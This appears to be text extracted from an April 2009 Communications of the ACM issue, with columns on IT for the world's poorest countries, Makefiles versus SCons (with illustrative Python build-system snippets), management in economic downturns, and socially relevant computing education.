Katz calls entrepreneurs and venture capitalists “a very important and underexamined dimension” for IT R&D. “The takeaway I’d want for Congress is that one size does not necessarily fit all,” Katz says. “Having some understanding [of this] is important in the way that they draft that legislation.”


Alan Joch is a business and technology writer based in 
Francestown, NH. 
Emerging Markets
IT and the World’s 
“Bottom Billion” 


How can information technology be best applied to address problems 
and provide opportunities for inhabitants of the world’s poorest countries? 


WHILE CELEBRATING THE emerging markets of Asia, India, and Latin America, let’s spare a thought for the world’s “bottom billion.” These are the inhabitants of the Fourth World that sits beneath the Third World: dozens of countries that, in the words of economist Paul Collier, “are falling behind, and often falling apart.”

As informatics professionals, why should we care about these countries? And how might IT best be used to help them?

The bottom billion, a population equivalent to that of the U.S. and Europe combined, lives overwhelmingly in sub-Saharan Africa or Central Asia. Life expectancy in these regions is just 50 years. One in seven children dies before the age of five. They missed the globalization boat that sailed with many other developing countries in the 1980s and 1990s. While those other countries have grown steadily richer, the Fourth World of the bottom billion was actually poorer in 2000 than it was in 1970. These countries are not emerging markets but fading markets: the whole of sub-Saharan Africa has an economy the size of Belgium’s.

Should we be concerned? 

Simple ethics says we should: developing an e-business solution to squeeze out a few extra ounces of profit or time-saving for the world’s privileged population living in the global North pales in ethical importance compared to applying new technology to the megaproblems of the bottom billion. And self-interest says we should: the bottom billion (countries like Somalia, Afghanistan, and North Korea) are key sources of global instability and risk, including drugs, piracy, and terror.

Not surprisingly, the bottom-billion nations have been among the least digital. But that is changing. Official figures may indicate an average of only three Internet users per hundred population, but that greatly underestimates the true reach. Information technology in the Fourth World is a communal, not individual, resource. As a result, many times more people are casual users, and many times more again have indirect access to Internet-based data and applications through friends and relations. Internet connectivity is also growing fast: by 42% per annum in the bottom billion, compared to 18% in Europe.
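To put those two growth rates side by side, a back-of-the-envelope doubling-time calculation helps. It assumes, purely for illustration, that each rate stays constant year after year, which the figures above do not claim:

```latex
T_{2} = \frac{\ln 2}{\ln(1 + r)}, \qquad
T_{2}\big|_{r = 0.42} = \frac{0.693}{0.351} \approx 2.0 \text{ years}, \qquad
T_{2}\big|_{r = 0.18} = \frac{0.693}{0.166} \approx 4.2 \text{ years}
```

At those rates, connectivity in the bottom billion would double roughly twice as often as in Europe.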

Beyond the Internet, there is an even greater bottom-billion phenomenon: the cellphone. Ten years ago, Manhattan had more phone connections than all of Africa. Today, thanks to the cellphone, Africa has more phone connections than the U.S. and Canada combined. Approximately one-fifth of bottom-billion citizens are subscribers (up from approximately 2% at the start of the century), but, as with the Internet, the effective penetration, counting those who could access a cellphone from neighbors, relatives, or local call sellers if necessary, is higher: likely more than half the population.


Subscriber growth rates are also high (50% per year compared to less than 20% in Europe) and are sometimes highest in the most-afflicted countries. Three of the most insecure and unstable bottom-billion countries, Afghanistan, the Democratic Republic of the Congo, and Somalia, have high investment levels and an average annual growth rate of 100%. Those rates are likely to be sustained: in sub-Saharan Africa, for example, an estimated 90% of the population will be within cellphone coverage by 2012, up from 60% today.

We are still a long way from North American rates of IT usage, but it is well past time to move from talking about vague future possibilities and begin talking about actual current priorities.

The first priority should be engagement. I wonder how many Communications readers are working on an informatics project in a bottom-billion country. It is likely not a large number, because we tend to work where the money is rather than where the problems are.

In terms of IT, the three key priorities are mobiles, mobiles, and mobiles.


As indicated earlier in this column, cellphones are now reaching far down into the bottom billion. At present, development solutions will need to be based around voice and text. But other possibilities are rapidly opening up.
One set of these possible solutions involves the integration of mobiles with other IT. This scenario could involve radio and television, converting these high-penetration but broadcast-only media into much more interactive forms, as is currently being achieved in the growing number of “community radio” projects. Or we can think of integrating phones with telecenters and kiosks. Pilot projects already under way suggest this can multiply the impact of Web access many times.


How will the Web and Internet reach the bottom billion? The GSM Association estimates that 80% of Internet delivery will occur through mobile devices. However, mobiles are not the only way forward. WiMAX-plus-netbook systems can offer high-quality, low-cost Internet access. Even more intriguing is the potential use of “white space”: the unused parts of the analog television broadcast spectrum. For the bottom billion, it will be many years before digital switchover and release of analog spectrum space, but new technology could be developed to identify and use existing white space spectrum gaps. This reallocation of spectrum space could offer wide-reaching broadband Internet service at a fraction of the cost of other solutions.

In all these areas, though, we need 
more, better, and less expensive tech- 
nological innovations that focus on the 
particular conditions and resource con- 
straints of bottom-billion customers. 

Beyond hardware and software, what 
application priorities do the bottom bil- 
lion demand? 

Analysis of the problems of the Fourth World may help provide an answer. The key problem is that of exclusion: the average bottom-billion citizen lives a life that is more 14th century than 21st century because their countries have been excluded from the benefits of globalization and because, within their countries, these citizens are excluded from the services, opportunities, and resources that we in the global North take for granted.

Social exclusion has prevented the bottom billion from accessing basics like health care, education, and government services. Many of these functions are information-based or information-enabled. IT therefore has a central role to play. For example, it can disintermediate the sometimes-corrupt gatekeepers who stand between poor citizens and the meeting of their social development needs.

Political exclusion has helped perpet- 
uate bad governance in bottom-billion 
countries. Our Western mentalities have 
tended to simplistically condense the 
solution into elections. But Paul Collier 
argues these have been the least effec- 
tive part of the governance fixes for the 
most-troubled nations. Instead, he says, 
we should be seeking greater transpar- 
ency: helping citizens hold their govern- 
ments to account. 

Transparency is all about information flows, so IT is crucial, and we already have some pointers about new ways in which it can be used. In West Africa, the notion of government surveillance has been turned on its head to create citizen “sousveillance”: monitoring democratic processes and reporting on them using short message service (SMS) and taking cellphone pictures as evidence.

In East Africa, open information sys- 
tems are being used to publicize how 
much government spending should be 
getting through to the “front line” of 
development. Combined with citizen 
report-back, in one case this raised the 
amount reaching schools from 20% of
allocation to 90%.

And IT is integral to a new form of 
openness and engagement: e-participa- 
tory budgeting, which provides online 
citizen discussion and decision making 
on how part of the government budget 
will be spent. Projects so far find thou- 
sands of people participating, and many 
more involved via friends and other IT- 
savvy intermediaries. 

Perhaps most important of all is economic exclusion. It should be axiomatic that the main difference between the world’s poorest and everyone else is... they have less money. We need to ensure, in harnessing IT for the bottom billion, that a strong priority is given to applications that help create wealth. To do this, IT must address the exclusion of poor individuals and poor nations from markets.


IT can generate new market opportunities. Flying somewhat under the radar of government and donor agencies, IT can help directly create new microenterprises for the poor. Ongoing research at the University of Manchester suggests this is one of the fastest-growing sectors in the bottom billion: it involves those who set up their own Internet kiosks, those who stand on street corners selling cellphone calls, those who sell prepaid cellphone cards and phone covers, and many other business ideas.

IT can offer access to new sources 
of finance. Organizations like Kiva use 
Web microfinance portals to make a 
direct link between individual sponsors 
in the global North and microentrepreneurs
in the bottom billion. In a less
organized way, individuals in poor com- 
munities are turning their cellphones 
into mobile wallets. Relatives overseas 
remit money in the form of airtime. 
This arrangement is increasingly ac- 
cepted by storeowners, colleges, health 
centers, and other organizations as an 
alternative form of currency. 

And IT can improve opportunities for trade. By offering access to prices in different consumer markets, IT can increase incomes for the poor. We now have evidence indicating that the more remote the farmer or microentrepreneur, the greater the benefit of IT. As the IT base diffuses into the bottom billion, it also offers the prospect of digital trade, something especially valuable given that these nations are disproportionately landlocked. One small but quickly growing element of this is “IT social outsourcing”: the offshoring of IT services work like digitization and data entry with a combined commercial and developmental intent. Evidence from initial projects suggests this can furnish not just new incomes but new skills and confidence to those involved.

Perhaps I can best summarize all 
this by pointing to the psychological 
exclusion that we in the global North 
sometimes practice. We tend to exclude 
the bottom-billion countries from our 
worldviews and from our informatics 
work. We tend to assume that IT has lit- 
tle or no role in these countries. In fact it 
does already and will in the future have 
much to offer. We also tend to conceive 
of the bottom-billion citizens as non-users. In fact they are not only increasingly active users but also, in some sense, innovators: constantly developing new applications and new business models with the technology while also looking for ideas and support from global partners like us.
System Changes
and Side Effects 


Comparing the potential benefits of system changes that help 
and the detriments of changes made for the sake of change. 


Dear KV, 

I maintain a legacy system at work that 
uses Makefiles for building the code. 
Recently my company switched to a dif- 
ferent system—SCons—for doing soft- 
ware builds and now I’m being asked 
to update our legacy code to build with 
this system. Personally, I don’t see that 
we will get any benefit switching a leg- 
acy system’s build strategy, but it’s an 
order from management so I will likely 
have no choice. Why would anyone 
bother to switch a working build sys- 
tem to a newer one? Are build systems 
really that different? Is there really any 
innovation here that could matter? 

All Built Up 
Dear Built Up, 
Innovation, as someone should have said, is in the eye, or perhaps hands, of the beholder. KV rarely condones change for its own sake: the change has to have some appreciable benefit to those who are working with the system. As this relates to build systems, there are few things more important to a programmer’s workflow, and therefore productivity, than how their system is built. A poorly implemented build system will impede progress and lead to wasteful programmer downtime, mostly made up of programmers playing games in the hallway, buying questionable items on the Web, and learning yo-yo tricks. All fine pursuits, of course; I learned at least five yo-yo tricks on one job when it took 20 minutes to build a piece of software, and the build locked up the machine we all used for our work. Of course such crippling times are in the past now; with the advent of speedy CPUs, memory, and disks, there is no longer any wasted programmer time, and we can all depend on a quick compile/link phase. Uh, perhaps not.
There are several reasons why people switch build systems. I think the most common one is that people hate and fear Makefiles. Other than the misnamed autotools, there is probably no more maligned component in a build system, and with good reason. While a simple Makefile is easy to read, a large software system requires a set of interlocking, and usually undocumented, Makefiles that can be as difficult to understand as modern architecture, and are quite often just as pretty to look at. Pull out just one piece and the whole edifice will come crashing down upon your head. The complexity of a system of Makefiles does not, normally, come from some perverse turn of mind of the authors, but is in fact due to three problems. The first is that dependency analysis, which is what the make program does, is a non-trivial exercise; the second is that Makefiles and build systems are generally not designed, they are accreted; and the third is that the build system is usually stretched to do all kinds of things that were not originally foreseen.
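To give a feel for the first problem, here is a minimal sketch in Python (not how make itself is implemented) of the ordering half of dependency analysis. Given a hypothetical map from each target to its direct prerequisites, it produces an order in which every prerequisite comes before whatever depends on it, and it refuses to continue when it finds a cycle. The file names are made up for illustration, and deciding which of those targets are actually out of date is a separate step.

```python
from typing import Dict, List


def build_order(deps: Dict[str, List[str]]) -> List[str]:
    """Order targets so every prerequisite precedes the targets that need it.

    `deps` maps each target to its direct prerequisites; names that never
    appear as keys (source files, headers) are treated as leaves.
    Raises ValueError if the graph contains a cycle.
    """
    order: List[str] = []
    state: Dict[str, str] = {}  # "visiting" while on the DFS path, then "done"

    def visit(node: str, path: List[str]) -> None:
        if state.get(node) == "done":
            return
        if state.get(node) == "visiting":
            # We came back to a node still on the current path: a cycle.
            raise ValueError("dependency cycle: " + " -> ".join(path + [node]))
        state[node] = "visiting"
        for prereq in deps.get(node, []):
            visit(prereq, path + [node])
        state[node] = "done"
        order.append(node)  # post-order: all prerequisites already appended

    for target in deps:
        visit(target, [])
    return order


# Hypothetical project: one program linked from two object files.
deps = {
    "app": ["main.o", "util.o"],
    "main.o": ["main.c", "util.h"],
    "util.o": ["util.c", "util.h"],
}
print(build_order(deps))
# -> ['main.c', 'util.h', 'main.o', 'util.c', 'util.o', 'app']
```

Depth-first post-order is only one way to do this. Even this toy version has to cope with a shared prerequisite (util.h) and with cycles before a single timestamp has been compared.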

In the beginning was the Makefile, 
and it was good. It contained at most 
a few targets and a handful of source 
files. The rules to determine what 
should be built and when were straight- 
forward and all was right with “make 
world.” Over time all software systems 
grow and so the Makefile becomes 
the root of a tree of Makefiles that are 
spread across a set of directories. Next 
the include directive is used, and then 
chaos ensues. The tree that was rooted 
in the original Makefile becomes a set 
of creeping vines, with a strong resem- 
blance to poison ivy because no one 
wants to touch it. 

A typical build system not only takes source files and turns them into binary programs, but it may also be co-opted to produce documentation from the source code, perform pre-checkin testing, and so forth. Every time you add a new responsibility to the system you must tweak it in some way, which usually has unintended side effects. Eventually the Makefiles become so complex that they’re impossible for new users to modify, and even experienced users make mistakes because modifications are likely to be infrequent. Just as with code, engineers rarely document their Makefiles; as a matter of fact, Makefiles are likely never documented, even if the code is. The most common documentation for a build system consists of the rather unhelpful “type make<rtn>,” which works in the typical case but gives no information as to how to debug a problem in the make system.

26 COMMUNICATIONS OF THE ACM APRIL 2009
Speaking of debugging, this is one of the places where the make program fails miserably. While it does have a command line flag to say “don’t do what I say, just show me what you’d do” as well as another command line flag to show debugging information, the output is usually so voluminous that it is unusable, and you wind up deleting and commenting lines in the Makefile until your bug is hidden, because removing lines doesn’t actually make the bug go away. Debugging Makefiles can make you tear your hair out, and for what? You probably just wanted to add a build option or a new file to your system and now you’ve wasted two hours with your Makefiles. So, Makefiles are ugly and make people nervous, and they tend to start scratching themselves absent-mindedly if you ask them to fix them.
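The “just show me what you’d do” mode (in GNU make, the -n flag) is most useful when it also says why. Below is a minimal sketch in Python, not make’s actual algorithm, of a dry run that compares hypothetical modification times and reports, for each target it would rebuild, which prerequisites triggered the rebuild. The file names, timestamps, and hand-written build order are invented for illustration.

```python
from typing import Dict, List, Tuple


def plan(order: List[str], deps: Dict[str, List[str]],
         mtime: Dict[str, float]) -> List[Tuple[str, str]]:
    """Dry run: list (target, reason) for every target that would be rebuilt.

    `order` must list prerequisites before the targets that use them.
    `mtime` holds modification times of files that exist; a missing key
    means the file does not exist. A missing source file raises KeyError,
    roughly where make would report that it has no rule for the file.
    Nothing is executed.
    """
    rebuilt = set()
    actions: List[Tuple[str, str]] = []
    for target in order:
        prereqs = deps.get(target, [])
        if not prereqs:
            continue  # a leaf such as a source file: nothing to build
        if target not in mtime:
            reason = "target does not exist"
        else:
            # A prerequisite counts as newer if it will itself be rebuilt,
            # or if its timestamp is later than the target's.
            newer = [p for p in prereqs
                     if p in rebuilt or mtime[p] > mtime[target]]
            if not newer:
                continue
            reason = "newer prerequisites: " + ", ".join(newer)
        rebuilt.add(target)
        actions.append((target, reason))
    return actions


order = ["main.c", "util.h", "main.o", "util.c", "util.o", "app"]
deps = {
    "app": ["main.o", "util.o"],
    "main.o": ["main.c", "util.h"],
    "util.o": ["util.c", "util.h"],
}
# Hypothetical timestamps: util.h was edited after the objects were built.
mtime = {"main.c": 100, "util.h": 300, "util.c": 100,
         "main.o": 200, "util.o": 200, "app": 250}

for target, reason in plan(order, deps, mtime):
    print(f"would rebuild {target}: {reason}")
# would rebuild main.o: newer prerequisites: util.h
# would rebuild util.o: newer prerequisites: util.h
# would rebuild app: newer prerequisites: main.o, util.o
```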


If you think make is bad, well, SCons is certainly more interesting. It seems that what make lacked was a scripting language, since we all know that adding a language to a system will make it easier to use! SCons is written in Python, and Python is the language in which its SConstruct files, the equivalent of Makefiles, are written. Much like make, if you want to do something simple with SCons it’s pretty easy to do so. If you thought that a complex set of Makefiles was difficult to understand, try reading a complex set of SConstruct files. You’ll not only need to load up the mental context for your project, you’ll also need to load your brain with Python. Now, don’t get me wrong, Python is a fine thing, I code in it frequently, but I don’t want to have to hack Python to get my software builds going.

Having recently been exposed to SCons, I can say that I don’t prefer it over make. Although the system I was working with had supposedly been extended to build code with profiling turned on, that extension was clearly not working. When I asked another engineer how he built the system with profiling, his reply was, “I just hack it.” “OK,” I thought to myself, “let’s see if I can just fix this.” After all, I was going to need profiled code for quite a while and it seemed dumb of me to check out an extra copy of our tree just to have what should be possible with a compiler flag. Had I known what lay ahead, and were I a less stubborn engineer, I would have checked out another copy of the tree. I was determined to “do things right” and therein lies the road to madness. It took about four hours to load up the proper mental context and to understand the interlocking SConstruct files. After many detours and chasing several wild geese, I was able to get my profile flags correctly into the build system. Strangely enough, the number of lines I changed was fewer than 10, but finding which 10 lines was the interesting part. If I had not already been a Python programmer, it would probably have taken days to get this to work.
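One way to keep a change like that down to a line or two is to put each build variant’s flags in a single table that every compile and link command draws from, and to give each variant its own output directory so profiled and unprofiled objects never mix. The sketch below is plain Python, not SCons (which has its own mechanisms, such as variant directories). The variant names, the cc compiler name, and the build/ layout are assumptions for illustration; -pg is the GCC/Clang option for gprof profiling and is passed at both compile and link time.

```python
import os
from typing import Dict, List

# Hypothetical variant table: the only place build flags are spelled out.
VARIANTS: Dict[str, Dict[str, List[str]]] = {
    "release": {"cflags": ["-O2"], "ldflags": []},
    "debug": {"cflags": ["-O0", "-g"], "ldflags": []},
    # gprof profiling needs -pg when compiling and again when linking.
    "profile": {"cflags": ["-O2", "-pg"], "ldflags": ["-pg"]},
}


def object_path(source: str, variant: str) -> str:
    """Place objects under build/<variant>/ so variants never overwrite each other."""
    stem, _ext = os.path.splitext(source)
    return f"build/{variant}/{stem}.o"


def compile_cmd(source: str, variant: str, cc: str = "cc") -> List[str]:
    return [cc, *VARIANTS[variant]["cflags"], "-c", source,
            "-o", object_path(source, variant)]


def link_cmd(objects: List[str], program: str, variant: str,
             cc: str = "cc") -> List[str]:
    return [cc, *VARIANTS[variant]["ldflags"], *objects,
            "-o", f"build/{variant}/{program}"]


sources = ["src/main.c", "src/util.c"]
objs = [object_path(s, "profile") for s in sources]
for s in sources:
    print(" ".join(compile_cmd(s, "profile")))
print(" ".join(link_cmd(objs, "app", "profile")))
# cc -O2 -pg -c src/main.c -o build/profile/src/main.o
# cc -O2 -pg -c src/util.c -o build/profile/src/util.o
# cc -pg build/profile/src/main.o build/profile/src/util.o -o build/profile/app
```

The separate output directory is what removes the need for a second checkout of the tree: a profiled build and a normal build can sit side by side.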

Don’t get me wrong, SCons certainly has some interesting features, including built-in support for object caching, but I would be hard-pressed to call it an improvement over make. My advice to you is to stick with what you have if you can, particularly since you say the system is a legacy system. And my advice to those who wish to make my life easier by changing basic tools is to study the existing tools very carefully and to figure out which changes really help and which changes are just there for the sake of change.
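Object caching of the kind mentioned above generally works by keying each compiled object on a signature of everything that went into it, so an identical compile can be served from the cache instead of rerun. The Python sketch below illustrates that idea with an in-memory dictionary and a stand-in compile function; it is not SCons’s implementation, and a real cache would also fold in the compiler version and the contents of included headers.

```python
import hashlib
from typing import Callable, Dict, List


def _feed(h, data: bytes) -> None:
    """Length-prefix each field so different inputs can't hash identically."""
    h.update(len(data).to_bytes(8, "big"))
    h.update(data)


def signature(source: bytes, flags: List[str]) -> str:
    """Key an object file by the exact source text and flags that produce it."""
    h = hashlib.sha256()
    _feed(h, source)
    for flag in flags:
        _feed(h, flag.encode())
    return h.hexdigest()


class ObjectCache:
    def __init__(self) -> None:
        self._store: Dict[str, bytes] = {}
        self.hits = 0
        self.misses = 0

    def get_or_build(self, source: bytes, flags: List[str],
                     compile_fn: Callable[[bytes, List[str]], bytes]) -> bytes:
        key = signature(source, flags)
        if key in self._store:
            self.hits += 1
        else:
            self.misses += 1
            self._store[key] = compile_fn(source, flags)
        return self._store[key]


def fake_compile(source: bytes, flags: List[str]) -> bytes:
    # Hypothetical stand-in for invoking a real compiler.
    return b"object code for " + source + b" " + " ".join(flags).encode()


src = b"int main(void) { return 0; }\n"
cache = ObjectCache()
cache.get_or_build(src, ["-O2"], fake_compile)         # miss: compiled
cache.get_or_build(src, ["-O2"], fake_compile)         # hit: same inputs
cache.get_or_build(src, ["-O2", "-pg"], fake_compile)  # miss: flags changed
print(cache.hits, cache.misses)  # -> 1 2
```

Keying on content rather than timestamps means that touching a file without changing it, or switching back to a previously built flag set, does not force a recompile.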

KV 


George V. Neville-Neil (kv@acm.org) is the proprietor of Neville-Neil Consulting and a member of the ACM Queue Editorial Board. He works on networking and operating systems code for fun and profit, teaches courses on various programming-related subjects, and encourages your comments, quips, and code snips pertaining to his Communications column.
and Management
Strategies for Difficult (and 
Darwinian) Economic Times 


How the axiom of survival of the fittest applies in 
the context of a global economic downturn. 


CHARLES DARWIN HAS had considerable impact not only on the field of biology but also on theories of industry evolution and management. Within sociology departments and business schools, for example, during the 1970s and 1980s there emerged a strain of “population ecologists” that continues to influence much of the research on organizations and industries today. These scholars see a Darwinian process of survival that occurs at the “population” (the industry) level and has little to do with the actions (or inactions) of individual managers and firms. The argument, in simple form, is that most companies are unable to adapt to major change and that successful companies are mainly those whose structural characteristics happen to match well with demands of the new environment.[a] For example, most mainframe computer companies were unable to adapt to small machines and distributed computing, and so they disappeared. General Motors and other automobile makers that cannot efficiently operate at low production volumes and make money with small, fuel-efficient vehicles with tiny profit margins will face the same fate as vacuum tube producers that could not adapt to transistors.

a The most important early works on this topic are Michael Hannan and John Freeman, “The Population Ecology of Organizations,” The American Journal of Sociology 82, 5 (May 1977), 929-964; Howard Aldrich, Organizations and Environments, Stanford University Press, Palo Alto, CA, originally published 1979, classic edition 2008. See also Michael Hannan and John Freeman, Organizational Ecology, Harvard University Press, Cambridge, MA, 1989.
Let me say up front that I do not completely agree with the population ecologist view. I have worked with many companies since the 1980s and believe the actions of managers had an important impact on performance and survival. I also teach in a business school where, we presume, it is worthwhile teaching MBA candidates something about management. But it seems true that many organizations are unable to change, and that Darwinian processes take place as industries mature, companies fail, and industries consolidate over time. As I have written elsewhere, the U.S. has seen the number of publicly listed software product companies drop from over 400 in 1998 to fewer than 150 in 2006. The number of U.S.-listed IT services companies has experienced a similar consolidation.[b] If we look carefully at other industries (computer hardware, semiconductors, and telecommunications equipment, as well as automobiles), we see similar declines in the number of firms over time.[c]
Many of these industries will evolve and change, and even rebound as new competitors and technologies appear. U.S.-based companies like RCA and GE thought the consumer electronics and computer hardware businesses were mature by the early 1970s, and exited, missing enormous opportunities ranging from VCRs to PCs and Internet services. So it is dangerous to assume that all industries will mature, consolidate, and decline. But what are managers to do when they face difficult economic times in their businesses, especially if, in the long run, theorists tell us the managers’ individual actions may have little to do with the survival of their firms?

First, they should believe in Darwin—the fittest and the luckiest are most likely to survive. Government protection or subsidies are likely only to delay the inevitable. At the same time, however, managers need not believe in the extreme views of the population ecologists. Though change is difficult, something will separate the survivors from the failures. It may sometimes be luck or random processes (the market equivalent of genetic mutations). But managers cannot take that chance. They must assume their actions are relevant and may well make the difference between survival and failure. So what managers do or do not do is more, not less, important in difficult economic times, though the best managers are probably those who foresee and respond to the subtle hints of a changing environment before radical change and economic calamity actually set in.

b Michael Cusumano, “The Changing Software Business: Moving from Products to Services,” IEEE Computer 41, 1 (Jan. 2008), 78-85.

c See Fernando Suarez and James Utterback, “Dominant Designs and the Survival of Firms,” Strategic Management Journal 16, 6 (June 1995), 415-430.

Second, once in the throes of an economic crisis, managers must do all they can “to save the mother ship” and make sure they will live to fight another day. Most companies have a set of core activities and people, and then peripheral activities and people. The extra weight may be fine to have around in good times and usually is justified as “diversification” or “future growth areas.” But, in bad times, the non-core areas are likely to be cash drains and management distractions, and can easily turn into fatal liabilities. So, when sales start declining, managers should use this period as an opportunity to trim waste and wishful thinking and get back to the strongest foundations of their companies.

The following example is illustrative of the decisions that must be made under difficult economic circumstances. I consulted for a particular software vendor that vastly expanded its product lines during the Internet boom, growing extremely fast but accumulating hundreds of millions of dollars in losses that it viewed as an investment in the future. By the time the Internet bubble burst, the company’s lineup had ballooned to some 144 distinct products, with a huge cash drain because thousands of salespeople, product managers, product engineers, quality staff, and field consultants were needed to design, deliver, and support all these products. I got the finance department to find out exactly which products were selling and which were not. We concluded that customers were really only buying 12 products. Revenues purported to come from the other products in fact were subsidies that came from licensing those 12 products in bundles with the other 132 products. My recommendation was to get rid of 80%-90% of the company’s products and personnel, which I thought would ensure that at least the core of the company would survive. The management team resisted. Eventually, it took five years, a delisting from the stock market, near bankruptcy, and many senior-position departures before the company ultimately downscaled. It is a shadow of its former self but has survived to compete (or sell itself) another day.

In addition to scaling back to the strongest product or service lines, saving the mother ship means saving as many of the best people as you can. Simply cutting staff across the board makes no sense for most technology businesses because they depend so much on intellectual capital. Furthermore, if managers have to borrow money continually or get repeated cash infusions from their investors or their governments, then they are likely to have little or no negotiating power. If they do get additional money, it will be on Draconian terms—and managers should prefer to deal with Darwin rather than Draco (the ancient Greek lawmaker who favored very harsh punishments even for minor offenses).

Finally, I have a third recommendation for managers: Continue to look for opportunities to grow in areas of strength. As long as survival of the mother ship seems secure, then companies should use whatever resources they can afford to take advantage of the environment. Weak competitors will also be contracting but should be worse off, and their customers and talented employees are fair game. The companies that survive for the very long term are likely to be the smartest as well as the financially fittest: managers must be able to anticipate as well as exploit change in difficult economic times.


Michael Cusumano (cusumano@mit.edu) is Sloan Management Review Distinguished Professor of Management and Engineering Systems at the MIT Sloan School of Management and School of Engineering in Cambridge, MA.


Copyright held by author. 
Computing as Social Science


Changing the way computer science is taught in college by encouraging students to develop solutions to socially relevant problems.


I have been concerned with the decline in computer science enrollments nationwide,ᵃ and it increasingly bothered me as I prepared for the fall semester last year. With each new freshman class I worry that fewer students are choosing a career in computer science, and it’s no stretch of the imagination to think it’s an image problem. Not only are we not getting the word out to high schools, but I believe we’re losing students in the first year of college as well. And it’s because we don’t offer students the idea that computer science is social, relevant, important, and caring, and thus we lose their interest. There might in fact be studies that show this, or perhaps not, but it’s something I feel.

I began my last summer break as I do almost every year, looking through textbooks for something usable for a fall course in programming. I teach Java, which is more than adequate for new programmers to learn everything good and bad about addressing a computer. What they learn is that computers never do what we want, but only what we tell them to do. And what we tell them to do in a freshman programming course is too often dull. Write to the operator, print out the results of a calculation, order some list, and all too often the message, calculation, and list are irrelevant. How can I get them interested? I’m determined at the start of every semester to have a batch of eye-opening, to-the-point, significant examples, lessons, and problems.

a See http://www.cra.org/wp/index.php?p=105.

To learn more about David’s story, see http://www.sociallyrelevantcomputing.org/.

And so I look through the textbooks and the examples and sample programs, and I become aware of an obsession with animals. In the first 10 textbooks I’ve skimmed, I’ve learned how to count ducks, categorize puppies, separate cows from horses, manage a pet store, create a cyber-pet, add fish to a bowl, and so it goes. This can’t possibly be the least bit interesting to a freshman who wants to learn computing.

I go back through the textbooks intentionally avoiding animal references and instead look for something else. I find games, plenty of them: Tetris, Othello, checkers, tic-tac-toe, even a good approximation of chess moves, which is wonderful if you come to college to play games. I’m not even sure what programming principle they’re trying to teach, and in my best attempt at empathy with an incoming freshman, my eyes glaze over. I’m bored, and I have a vested interest. How can a student possibly find interest and relevance in this stuff? The texts rely solely on the student to be interested enough in programming to overcome the banality. We all know that practice is more fun than theory, but our attempts at practice aren’t real.

I move on...let’s see...a doughnut counter to show iterations, a pizza maker to construct a list, a lemonade stand to demonstrate databases. If I were a student, beginning these important four years, and were taught programming via doughnut machines, I would quit and go do something important. Major in some field that had an impact. Even the sterile environment of pure mathematics has me counting and measuring planets and populations. Sociology and psychology would have me charting behaviors. Chemistry and physics have me connected to the environment. Computing as portrayed in the literature has me running a pet store, playing games, or eating. That would seem to be it. There isn’t a textbook out of the 60 I have on my shelf that makes me see computing as socially relevant.

And so the message is just not getting out there. Students’ firsthand experience with computers—their music and their phones—is accepted and reinforced by the image we portray in school—one of unrelenting banality and geekdom—and potential computer science students do not see themselves as having a greater impact.

At the University of Buffalo we have two senior-level courses that require teams to create real systems for real clients. They are introduced to the wider community of people with disabilities and told to make a difference. That’s it. Those are the instructions. Improve the quality of life of someone less able than you. If you can’t figure it out, you fail. So don’t fail.

A group of students tacked a sign up at a school for handicapped children that said “Student Inventors Available Free. Is there something you need? Call us.” And they heard from a mother whose daughter could not use a computer because she had no fine motor skills. She could move her arms but not her fingers. So they made her a trackball out of a basketball, and wrote games that use the wide swing of her arms as she rotates the basketball. It’s not perfect, but they were immersed and involved, and they visited with the family and they delivered a prototype. And no one will ever convince them that computer science is not social science, because outside the world of trivia we feed students in their freshman year, it certainly is.

Now people in the community call us. That’s how my students met David, who was 43, had suffered a stroke at age 27, and hadn’t been able to speak since. He communicated with his nurses by pointing to a sheet of paper that was taped to his wheelchair. It had letters, words, and short phrases, and after much practice, a nurse or therapist could almost decipher what he wanted to say. So our students transferred that sheet of paper to a tablet PC, and when David touches a word, the computer speaks it. How difficult is that? Easier than counting doughnuts. The night they delivered that system, David called me at home with his new voice and thanked me, and said he had waited 15 years to speak on the phone. And the pictures I saw later of the event clearly showed students crying.

Every once in a while, a student will say “I can’t find a project,” and I tell them to read the newspaper or consult other news sources. That itself sounds banal but it’s not: right below the surface of a news item, there is most likely a problem to be solved. Find someone or something in trouble, and save it. That’s how we found the number-one killer of firefighters on the job: it’s not fire, smoke, or Dalmatian attack; it’s heart attack. And so now we have a system that monitors vital signs and displays the statistics on a 3D model of a fire scene as the firefighters traverse it.ᵇ

We have remote-controlled wheelchairs, videoconferencing for homebound and hospital-bound children, a light-and-sound system (the students call it DISCO) that teaches cause-and-effect to autistic children, and many more systems constantly evolving. All of this technology and creative energy is at our fingertips, but to sample our craft in the popular literature, you would think we were cyber pets on one end, artificial intelligence on the other, and nothing useful in between.

b See http://www.sociallyrelevantcomputing.org/images/pic17.jpg.

So back to the textbooks and the freshman year. In the senior-level courses, you can see the difference between simply relaying a difficult concept (teachers know when that lightbulb goes off in a student’s head) and emotionalizing that concept (that’s a whole different look behind their eyes, and probably why teachers become teachers). How do we get that same reaction? It’s probably as much for me as for them that I want them to see computing as a craft for the greater good. I have to teach my students counting, so I will forgo puppies and have them design a tamperproof voting system. When they learn two-dimensional arrays it will be to monitor the flow of pollution through Lake Erie. Databases? Not fish in a bowl, but drug interactions. My good friend Devika Subramanian at Rice University taught me how to use disaster evacuation planning to teach optimal paths and routing instead of using chess. I can’t find any of these in a textbook that teaches CS1, so I’ll have to invent them.

I know that writing a textbook is difficult. But so is teaching, and so is learning.


Further Reading

1. Buckley, M. et al. Benefits of using socially relevant projects in computer science and engineering education. In Proceedings of the Special Interest Group on Computer Science Education Conference, 2004; http://www.sociallyrelevantcomputing.org/SIGCSE2004SociallyRelevantProjects.pdf.

2. Buckley, M., Schindler, K., Kershner, H., and Alphonce, C. Using socially relevant projects in a capstone design course in computer engineering. In Proceedings of the American Society for Engineering Education Annual Conference, 2004; http://portal.acm.org/citation.cfm?id=1028174.971463.

3. Nordlinger, N., Subramanian, D., and Buckley, M. Socially relevant computing. In Proceedings of the Special Interest Group on Computer Science Education Conference, 2008; http://www.cs.rice.edu/~devika/SIGCSEFinal.pdf.

4. Schindler, K., Buckley, M., Kershner, H., and Alphonce, C. Partnering with social service organizations to develop socially relevant projects in computer science and engineering. In Proceedings of the International Conference on Engineering Education, 2004; http://www.sociallyrelevantcomputing.org/ICEE2004.pdf.


Michael Buckley (mikeb@cse.buffalo.edu) is the director of the Center for Socially Relevant Computing at the University of Buffalo, NY.
Viewpoint


Research Evaluation for Computer Science


Reassessing the assessment criteria and techniques traditionally used in evaluating computer science research effectiveness.


